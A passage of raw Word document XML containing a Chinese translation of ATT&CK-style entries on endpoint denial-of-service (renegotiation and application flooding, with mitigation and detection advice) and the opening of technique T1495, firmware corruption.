        <w:t>协议套件包括客户端和服务器就用于后续安全连接的加密算法达成一致的机制。如果启用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>重新</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>协商功能</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，则可以请求重新协商加密算法。在重新协商攻击中，攻击者建立</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SSL/TLS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接，然后生成</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>一系列重新协商请求。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>由于密码重新协商在计算周期中有相当大的成本，因此处理</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>大量重新协商请求</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能会影响服务的可用性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43380DC4" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>耗尽泛洪</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5874EB73" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器堆栈顶部的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用可以作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击的目标。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用中的特定功能可能会占用大量资源。对这些功能的重复请求可能会耗尽资源并拒绝访问应用或服务器本身。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18796D0D" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>或系统漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05595023" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>软件存在漏洞，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用这些漏洞可能导致应用或系统崩溃并拒绝向用户提供可用性。发生崩溃后，某些系统可能会自动重启关键应用和服务，但是很可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>重新遭受漏洞攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，导致其处于持久的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>状态。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E63FBF9" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1834"/>
        <w:gridCol w:w="7902"/>
      </w:tblGrid>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00567ECD" w14:paraId="087C8DE2" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1834" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6CC64E34" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00567ECD" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7902" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="0EB31D6D" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00567ECD" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00567ECD" w:rsidRPr="00A65911" w14:paraId="63B2629D" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1834" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2D5BBBD1" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00CC5590" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId264" w:history="1">
              <w:r w:rsidR="00567ECD" w:rsidRPr="00A65911">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>网络流量</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00567ECD" w:rsidRPr="00A65911">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>过滤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7902" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33411AEA" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>CDN</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>或专门从事</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>DoS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>缓解工作的提供商提供的服务来过滤服务上游的流量。通过阻止源地址发起攻击、阻止目标端口或阻止用于传输的协议来过滤边界流量。要防御</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>SYN</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>泛洪攻击，请启用</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>SYN Cookies</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D7E188C" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="798081D5" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5201B373" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有时可以在端点</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>oS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击效果足以对服务的可用性造成重大影响之前就检测</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>到</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>的存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，但通常需要非常积极的监控和灵敏度。可使用典型的网络吞吐量监控工具（如</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>netflow</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>SNMP</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和自定义脚本）来检测电路利用率的突然增加。对网络流量的实时、自动化和定性研究可以识别某种协议中的流量突然激增，可以用于在攻击开始时就检测到它。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264E3259" w14:textId="77777777" w:rsidR="00567ECD" w:rsidRPr="00A65911" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>除了网络级别的检测之外，端点日志记录和工具也很有用。针对</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用的攻击可能会在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eb</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务器、应用程序服务器和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或数据库服务器中生成日志。这些日志可用于确定攻击类型，甚至可能在受到影响之前就已确定。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082B3ED5" w14:textId="2930A0AF" w:rsidR="00567ECD" w:rsidRPr="00567ECD" w:rsidRDefault="00567ECD" w:rsidP="00567ECD">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对外监控端点</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DoS</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击可能针对的服务的可用性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45040554" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E80DE0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>固件损坏</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="4515ABF0" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="464D2DF3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> T1495</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19E8933A" w14:textId="2FEF3E06" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00567ECD">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>恶劣</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>影响</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A64EAA5" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C8A75DC" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>管理员</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>, root</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46D8626C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>BIOS</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，组件固件</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7644997B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="008A3AA3" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>影响类型：可用性</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40C0F221" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="008A3AA3">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="008A3AA3">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B71E8C2" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00CD1B8D" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BFB3AC3" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="TableText"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D49A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会覆盖或破坏系统</w:t>
      </w:r>
      <w:r w:rsidRPr="007D49A6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BIOS</w:t>
      </w:r>
      <w:r w:rsidRPr="007D49A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或连接到系统的设备中的其他固件的闪存内容，以使其无法操作或无法启动。固件是从硬件设备上的非易失性存储器加载和执行的软件，用于初始化和管理设备功能。</w:t>
      </w:r>
      <w:r w:rsidRPr="007D49A6">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D49A6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这些设备可能包括主板，硬盘驱动器或视频卡。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400A0E0D" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1834"/>
        <w:gridCol w:w="7902"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w14:paraId="026B45C4" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1834" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="5CC9DFF0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7902" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="47A0E483" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00C71286" w14:paraId="2E896599" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1834" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68603150" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00C71286" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C71286">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>启动完整性检查</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7902" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D50C459" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00C71286" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C71286">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检查现有</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71286">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>BIOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00C71286">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>和设备固件的完整性，以确定它是否易于修改。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00C71286" w14:paraId="740C844F" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="661"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1834" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="680B5B32" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00C71286" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C71286">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特权账户管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7902" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16B68B59" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00C71286" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00C71286">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
